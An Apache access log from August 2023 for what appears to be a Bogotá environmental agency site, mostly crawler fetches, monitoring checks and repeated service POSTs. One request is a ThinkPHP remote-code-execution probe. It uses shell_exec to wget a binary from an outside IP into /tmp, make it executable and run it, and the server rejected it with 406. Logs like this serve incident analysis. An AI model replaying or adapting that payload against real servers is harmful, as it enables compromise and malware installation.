201.245.192.253 - - [11/Aug/2023:02:14:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:14:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:02:14:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60342
201.245.192.253 - - [11/Aug/2023:02:16:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:02:16:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.73.131 - - [11/Aug/2023:02:17:47 -0500] "GET /dia-mundial-de-la-tierra-unete-a-esta-celebracion-con-actividades-que-promueven-el-cuidado-de-nuestro-planeta.html HTTP/1.1" 200 818
216.245.221.92 - - [11/Aug/2023:02:18:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:02:18:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [11/Aug/2023:02:18:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:02:19:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43868
40.77.167.233 - - [11/Aug/2023:02:19:09 -0500] "GET /BLA/resoluciones/AUTOS%202011/4984.pdf HTTP/1.1" 200 135182
201.245.192.253 - - [11/Aug/2023:02:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43602
201.245.192.253 - - [11/Aug/2023:02:20:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:19:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:21:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
172.22.2.4 - - [11/Aug/2023:02:20:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
201.245.192.253 - - [11/Aug/2023:02:22:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.233 - - [11/Aug/2023:02:23:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%20%201601-1650/INDEX.DAT HTTP/1.1" 200 2000
40.113.193.122 - - [11/Aug/2023:02:23:13 -0500] "GET /robots.txt HTTP/1.1" 404 1049
216.245.221.92 - - [11/Aug/2023:02:23:25 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.30 - - [11/Aug/2023:02:23:38 -0500] "GET /robots.txt HTTP/1.1" 404 1035
64.124.8.30 - - [11/Aug/2023:02:23:39 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
201.245.192.253 - - [11/Aug/2023:02:24:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:02:26:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:02:26:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:25:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:02:26:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
216.245.221.92 - - [11/Aug/2023:02:28:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:28:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:02:29:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [11/Aug/2023:02:29:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43868
201.245.192.253 - - [11/Aug/2023:02:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43602
69.63.184.111 - - [11/Aug/2023:02:29:13 -0500] "GET /bogota-ya-cuenta-con-el-protocolo-para-el-manejo-y-control-de-la-langostilla-de-rio.html HTTP/1.1" 200 1088
119.8.59.36 - - [11/Aug/2023:02:29:50 -0500] "GET /galeria/galeria/fotos/1humedal-Burro1P.jpg HTTP/1.1" 200 7921
201.245.192.253 - - [11/Aug/2023:02:30:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:02:31:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:02:32:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:31:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Aug/2023:02:33:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:02:32:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58597
201.245.192.253 - - [11/Aug/2023:02:34:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
168.119.251.242 - - [11/Aug/2023:02:35:28 -0500] "GET / HTTP/1.1" 200 319
168.119.251.242 - - [11/Aug/2023:02:35:28 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [11/Aug/2023:02:36:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:02:36:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [11/Aug/2023:02:38:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:38:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:37:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43868
201.245.192.253 - - [11/Aug/2023:02:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43602
172.22.2.4 - - [11/Aug/2023:02:38:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
40.77.167.233 - - [11/Aug/2023:02:40:12 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
52.167.144.153 - - [11/Aug/2023:02:40:16 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [11/Aug/2023:02:40:20 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2004%20de%2021%20de%20abril%20de%202010.pdf HTTP/1.1" 200 682373
201.245.192.253 - - [11/Aug/2023:02:40:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
207.180.222.76 - - [11/Aug/2023:02:41:12 -0500] "GET /helpdesk HTTP/1.1" 404 1018
201.245.192.253 - - [11/Aug/2023:02:41:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:02:42:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [11/Aug/2023:02:43:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:02:43:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:44:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.73.128 - - [11/Aug/2023:02:45:18 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
172.22.2.4 - - [11/Aug/2023:02:44:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54597
201.245.192.253 - - [11/Aug/2023:02:46:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:02:46:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.233 - - [11/Aug/2023:02:48:22 -0500] "GET /Publicaciones/2023EE115507.pdf HTTP/1.1" 404 228
216.245.221.92 - - [11/Aug/2023:02:48:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:48:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:49:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:50:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:49:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
201.245.192.253 - - [11/Aug/2023:02:51:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
40.77.167.233 - - [11/Aug/2023:02:52:04 -0500] "GET /bla/resoluciones/autos%202012/1839.pdf HTTP/1.1" 200 275948
201.245.192.253 - - [11/Aug/2023:02:52:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [11/Aug/2023:02:53:25 -0500] "HEAD / HTTP/1.1" 200 -
119.13.85.85 - - [11/Aug/2023:02:54:12 -0500] "GET /galeria/galeria/fotos/diaSC7Peq.jpg HTTP/1.1" 200 18357
201.245.192.253 - - [11/Aug/2023:02:54:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:02:54:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:56:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
18.229.163.17 - - [11/Aug/2023:02:56:48 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [11/Aug/2023:02:56:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.70.197 - - [11/Aug/2023:02:57:11 -0500] "GET /Publicaciones/2023EE164643.pdf HTTP/1.1" 404 228
172.22.2.4 - - [11/Aug/2023:02:55:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [11/Aug/2023:02:58:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:02:58:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:00:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
64.124.8.30 - - [11/Aug/2023:03:01:23 -0500] "GET /portaldeninos/2021/05/30/agua-3/feed/ HTTP/1.1" 200 879
201.245.192.253 - - [11/Aug/2023:03:01:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
172.22.2.4 - - [11/Aug/2023:03:00:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.4 - - [11/Aug/2023:03:02:31 -0500] "GET /images/avistamiento-aves.jpg HTTP/1.1" 200 104313
173.252.107.117 - - [11/Aug/2023:03:02:39 -0500] "GET /images/camino-guadalupe-aguanoso.jpg HTTP/1.1" 200 103489
173.252.107.7 - - [11/Aug/2023:03:02:39 -0500] "GET /images/construccion-sostenible-.jpg HTTP/1.1" 200 82949
173.252.107.118 - - [11/Aug/2023:03:02:39 -0500] "GET /images/Caminatas-ecologicas-julio.jpg HTTP/1.1" 200 480557
201.245.192.253 - - [11/Aug/2023:03:02:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:03:01:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
216.245.221.92 - - [11/Aug/2023:03:03:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:03:04:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:06:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:03:06:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.33 - - [11/Aug/2023:03:08:10 -0500] "GET /BLA/resoluciones/AUTOS%202022/3645.pdf HTTP/1.1" 304 -
172.22.2.4 - - [11/Aug/2023:03:06:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Aug/2023:03:08:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:03:08:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:03:07:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60692
66.249.70.198 - - [11/Aug/2023:03:10:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5296.pdf HTTP/1.1" 200 257331
201.245.192.253 - - [11/Aug/2023:03:10:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:11:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
34.140.248.32 - - [11/Aug/2023:03:12:54 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [11/Aug/2023:03:12:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [11/Aug/2023:03:13:25 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:03:12:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:03:13:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
201.245.192.253 - - [11/Aug/2023:03:14:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.83.12 - - [11/Aug/2023:03:16:21 -0500] "GET /images/ecosistema-dia-internacional-tierra-21-abril.jpg HTTP/1.1" 200 30098
201.245.192.253 - - [11/Aug/2023:03:16:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:03:16:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [11/Aug/2023:03:18:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:03:18:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:19:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43526
201.245.192.253 - - [11/Aug/2023:03:19:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41257
172.22.2.4 - - [11/Aug/2023:03:18:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:03:19:59 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [11/Aug/2023:03:20:01 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
66.249.73.128 - - [11/Aug/2023:03:20:22 -0500] "GET /proyecto-avantia-con-la-union-europea-busca-especialista-en-cambio-climatico.html HTTP/1.1" 200 814
172.22.2.4 - - [11/Aug/2023:03:19:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54960
201.245.192.253 - - [11/Aug/2023:03:20:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:21:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:03:22:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [11/Aug/2023:03:23:25 -0500] "HEAD / HTTP/1.1" 200 -
74.62.145.76 - - [11/Aug/2023:03:23:40 -0500] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.95.146.36/lx/Chaosontopxd.x86 -O /tmp/.Chaosontopxd; chmod 777 /tmp/.Chaosontopxd; /tmp/.Chaosontopxd ThinkphpRep' HTTP/1.1" 406 -
162.55.175.141 - - [11/Aug/2023:03:24:29 -0500] "GET / HTTP/1.1" 200 319
162.55.175.141 - - [11/Aug/2023:03:24:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [11/Aug/2023:03:24:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:03:24:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:03:25:57 -0500] "GET /BLA/boletinlegal/norma_menu.php HTTP/1.1" 200 6328
66.249.70.198 - - [11/Aug/2023:03:25:58 -0500] "GET /BLA/resoluciones/AUTOS%202011/3183.pdf HTTP/1.1" 200 225765
172.22.2.4 - - [11/Aug/2023:03:26:12 -0500] "GET /BLA/boletinlegal/js/ajax.js HTTP/1.1" 200 772
172.22.2.4 - - [11/Aug/2023:03:26:12 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [11/Aug/2023:03:26:12 -0500] "GET /BLA/boletinlegal/swfobject.js HTTP/1.1" 200 9763
201.245.192.253 - - [11/Aug/2023:03:26:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
172.22.2.4 - - [11/Aug/2023:03:24:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57790
201.245.192.253 - - [11/Aug/2023:03:26:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [11/Aug/2023:03:28:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:03:28:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.70.197 - - [11/Aug/2023:03:29:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0273.pdf HTTP/1.1" 200 297201
201.245.192.253 - - [11/Aug/2023:03:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43526
201.245.192.253 - - [11/Aug/2023:03:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41257
66.249.70.197 - - [11/Aug/2023:03:29:57 -0500] "GET /Publicaciones/2023EE168850.pdf HTTP/1.1" 404 228
201.245.192.253 - - [11/Aug/2023:03:30:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.33 - - [11/Aug/2023:03:31:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12494
201.245.192.253 - - [11/Aug/2023:03:31:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
172.22.2.4 - - [11/Aug/2023:03:29:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:03:30:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57323
31.13.103.9 - - [11/Aug/2023:03:32:39 -0500] "GET /images/Reciclaton-2023.jpg HTTP/1.1" 200 68883
201.245.192.253 - - [11/Aug/2023:03:32:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.70.196 - - [11/Aug/2023:03:33:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1287.pdf HTTP/1.1" 200 644759
216.245.221.92 - - [11/Aug/2023:03:33:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Aug/2023:03:34:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:36:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
201.245.192.253 - - [11/Aug/2023:03:36:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:03:37:11 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000002%20DEL%2022%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 304 -
172.22.2.4 - - [11/Aug/2023:03:35:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Aug/2023:03:36:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
216.245.221.92 - - [11/Aug/2023:03:38:25 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.198 - - [11/Aug/2023:03:38:53 -0500] "GET /BLA/resoluciones/AUTOS%202014/4466.pdf HTTP/1.1" 200 525846
201.245.192.253 - - [11/Aug/2023:03:38:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43526
201.245.192.253 - - [11/Aug/2023:03:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41257
201.245.192.253 - - [11/Aug/2023:03:40:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [11/Aug/2023:03:41:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42098
66.249.70.198 - - [11/Aug/2023:03:42:20 -0500] "GET /resoluciones/RESOLUCIONES%202008/0621.pdf HTTP/1.1" 404 1018
185.180.143.140 - - [11/Aug/2023:03:42:45 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [11/Aug/2023:03:42:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [11/Aug/2023:03:41:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Aug/2023:03:43:25 -0500] "HEAD / HTTP/1.1" 200 -
185.180.143.140 - - [11/Aug/2023:03:43:44 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
172.22.2.4 - - [11/Aug/2023:03:42:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58187
185.180.143.140 - - [11/Aug/2023:03:44:50 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [11/Aug/2023:03:44:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62bb4f41a2c794dd6b247b81699c57719.e3iSbxaKaheRe34KbxiPbh0Naxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.70.198 - - [11/Aug/2023:03:45:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7495.pdf HTTP/1.1" 200 523542
66.249.70.197 - - [11/Aug/2023:03:45:57 -0500] "GET /BLA/resoluciones/AUTOS%202011/7414.pdf HTTP/1.1" 200 166923
